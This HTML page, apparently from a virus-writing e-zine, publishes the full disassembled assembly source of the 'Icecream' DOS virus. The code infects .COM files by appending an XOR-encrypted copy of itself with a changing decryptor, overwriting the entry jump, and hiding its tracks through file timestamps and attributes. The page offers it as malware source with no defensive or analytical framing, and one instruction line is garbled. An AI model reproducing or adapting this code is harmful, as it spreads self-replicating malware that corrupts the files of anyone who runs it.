<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=windows-1251">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>ThE NeW OrDeR #2</title>
</head>

<body bgcolor="#000000" link="#0000FF" vlink="#000080"
bgproperties="fixed" topmargin="15" leftmargin="20" "
vlink="#000080">

<p align="center"><img src="../Images/viruz.gif" width="560"
height="100"></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../images/Rs.jpg" width="640" height="12"></strong></font></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../Images/fogskul.gif" alt="OneHalf  Virii" width="160"
height="100"></strong></font></p>

<p align="center"><font color="#FF0000" size="6"><strong>Icecream</strong></font></p>

<p align="left"><font color="#00FFFF"><strong>;
--------------------------------------------------------------------------<br>
; Disassembled by FairWind / NRG , nrgteam@mail.ru<br>
;
--------------------------------------------------------------------------</strong></font></p>

<p align="left"><font color="#FFFFFF"><strong>.model tiny<br>
.code<br>
org 100h<br>
<br>
start:<br>
db 0e9h,0ch,0<br>
<br>
Author_Name db 'John Tardy'<br>
<br>
db 0E2h,0FAh<br>
Virus_Entry:<br>
push ax<br>
call Get_Offset<br>
Get_Offset:<br>
pop ax<br>
sub ax,offset Get_Offset<br>
<br>
db 89h,0c5h<br>
lea si,[bp+Storage]<br>
mov di,100h<br>
movsw<br>
movsb<br>
<br>
mov ah,1Ah<br>
mov dx,0f900h<br>
int 21h<br>
<br>
mov ah,4Eh<br>
<br>
FindFirstNext:<br>
lea dx,[bp+ComMask]<br>
xor cx,cx<br>
int 21h<br>
jnc InfectFile<br>
<br>
Restore_DTA:<br>
mov ah,1Ah<br>
mov dx,80h<br>
int 21h<br>
mov bx,offset start<br>
pop ax<br>
push bx<br>
retn<br>
<br>
InfectFile:<br>
mov ax,4300h<br>
mov dx,0f91eh<br>
int 21h<br>
push cx<br>
mov ax,4301h<br>
xor cx,cx<br>
int 21h<br>
<br>
mov ax,3D02h<br>
int 21h<br>
<br>
mov bx,5700h<br>
xchg ax,bx<br>
int 21h<br>
<br>
push cx<br>
push dx <br>
and cx,1Fh<br>
cmp cx,1<br>
jne ContinueInfection<br>
db 0e9h,69h,0<br>
<br>
ContinueInfection:<br>
mov ah,3Fh<br>
lea dx,[bp+Storage]<br>
mov cx,3<br>
int 21h<br>
<br>
mov ax,cs:[Storage+bp]<br>
cmp ax,4D5Ah<br>
je DoneInfect<br>
cmp ax,5A4Dh<br>
je DoneInfect<br>
<br>
pop dx<br>
pop cx<br>
and cx,0FFE0h<br>
or cx,1<br>
push cx<br>
push dx<br>
<br>
mov ax,4202hcall Move_FP<br>
sub ax,3<br>
mov cs:[JumpSize+bp],ax<br>
<br>
add ax,10Fh<br>
mov word ptr [bp+EncPtr1+1],ax<br>
mov word ptr [bp+EncPtr2+1],ax<br>
mov word ptr [bp+EncPtr3+1],ax<br>
mov word ptr [bp+EncPtr4+1],ax<br>
call SetupEncryption<br>
<br>
mov ah,40h<br>
mov dx,0fa00h<br>
mov cx,1F5h<br>
int 21h<br>
<br>
mov ax,4200h<br>
call Move_FP<br>
mov ah,40h<br>
lea dx,[bp+JumpBytes]<br>
mov cx,3<br>
int 21h<br>
<br>
call FinishFile<br>
jmp Restore_DTA<br>
<br>
DoneInfect:<br>
call FinishFile<br>
mov ah,4Fh<br>
jmp FindFirstNext<br>
<br>
Move_FP:<br>
xor cx,cx<br>
xor dx,dx<br>
int 21h<br>
ret<br>
<br>
FinishFile:<br>
pop si dx cx<br>
mov ax,5701h<br>
int 21h<br>
mov ah,3Eh<br>
int 21h<br>
mov ax,4301h<br>
pop cx<br>
mov dx,0fc1eh<br>
int 21h<br>
<br>
push si<br>
retn<br>
<br>
Message db ' I scream, you scream, we both '<br>
db 'scream for an ice-cream! '<br>
<br>
SetupEncryption:<br>
xor byte ptr [bp+10Dh],2<br>
xor ax,ax<br>
mov es,ax<br>
mov ax,es:[46ch]<br>
push cs<br>
pop es<br>
push ax<br>
and ax,7FFh<br>
add ax,1E9h<br>
mov word ptr [bp+EncSize1+1],ax<br>
mov word ptr [bp+EncSize2+1],ax<br>
mov word ptr [bp+EncSize3+1],ax<br>
mov word ptr [bp+EncSize4+1],ax<br>
pop ax<br>
push ax<br>
and ax,3<br>
shl ax,1<br>
mov si,ax<br>
mov ax,[bp+si+EncData1]<br>
add ax,bp<br>
mov si,ax<br>
lea di,[bp+103h]<br>
movsw<br>
movsw<br>
movsw<br>
movsw<br>
pop ax<br>
stosb<br>
movsb<br>
mov dl,al<br>
lea si,[bp+103h]<br>
mov di,0fa00h<br>
mov cx,0Ch<br>
rep movsb<br>
lea si,[bp+10Fh]<br>
mov cx,1E9h<br>
<br>
EncryptVirus:<br>
lodsb<br>
db 30h,0d0h<br>
stosb<br>
loop EncryptVirus<br>
<br>
cmp dl,0<br>
je KeyWasZero<br>
retn<br>
<br>
KeyWasZero:<br>
mov si,offset AuthorName<br>
mov di,0fa00h<br>
mov cx,0Ah<br>
rep movsb<br>
mov ax,cs:[JumpSize+bp]<br>
add ax,0Ch<br>
mov cs:[JumpSize+bp],ax<br>
retn<br>
<br>
db '[TridenT]'<br>
<br>
EncData1 dw 02beh<br>
EncData2 dw 02c7h<br>
EncData3 dw 02d0h<br>
EncData4 dw 02d9h<br>
<br>
Encryptions:<br>
</strong></font><font color="#FFFFFF"><strong>EncPtr1:<br>
mov si,0<br>
EncSize1:<br>
mov cx,0<br>
xor byte ptr [si],46h<br>
</strong></font><font color="#FFFFFF"><strong>EncPtr2:<br>
mov di,0<br>
EncSize2:<br>
mov cx,0<br>
xor byte ptr [di],47h<br>
</strong></font><font color="#FFFFFF"><strong>EncSize3:<br>
mov cx,0<br>
EncPtr3:<br>
mov si,0<br>
xor byte ptr [si],46h<br>
</strong></font><font color="#FFFFFF"><strong>EncSize4:<br>
mov cx,0<br>
EncPtr4:<br>
mov di,0<br>
xor byte ptr [di],47h<br>
</strong></font><font color="#FFFFFF"><strong><br>
AuthorName db 'John Tardy'<br>
<br>
JumpBytes db 0E9h<br>
JumpSize dw 0<br>
<br>
ComMask db '*.CoM',0<br>
<br>
Storage dw 20CDh<br>
db 21h<br>
<br>
end start</strong></font></p>

<p align="center"><a href="../TNO#2_start.htm"><img
src="../images/14ic3.gif" border="0" width="60" height="65"></a></p>

<p align="center"><a href="mailto:nrgteam@mail.ru"><img
src="../images/coollogo_com_7565375.jpg" border="0" width="206"
height="53"></a></p>
</body>
</html>
